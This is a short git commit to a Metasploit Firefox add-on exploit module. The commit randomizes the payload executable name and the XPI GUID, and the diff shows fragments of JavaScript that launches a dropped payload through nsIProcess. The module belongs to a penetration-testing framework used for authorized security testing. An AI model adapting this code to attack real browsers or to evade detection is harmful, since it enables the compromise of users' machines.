Randomize guid and payload filename

This commit is contained in:
James Lee 2012-04-13 17:59:19 -06:00
parent 57ecc29b31
commit 3e0747f5d2
1 changed files with 2 additions and 3 deletions

View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
else
payload_file = generate_payload_exe
payload_name='payload.exe'
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
@ -148,8 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
zip = Rex::Zip::Archive.new
xpi_guid = '{d0df471a-9896-4e6d-83e2-13a04ed6df33}' #TODO randomize!
xpi_guid = Rex::Text.rand_guid
bootstrap_script = %q|
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].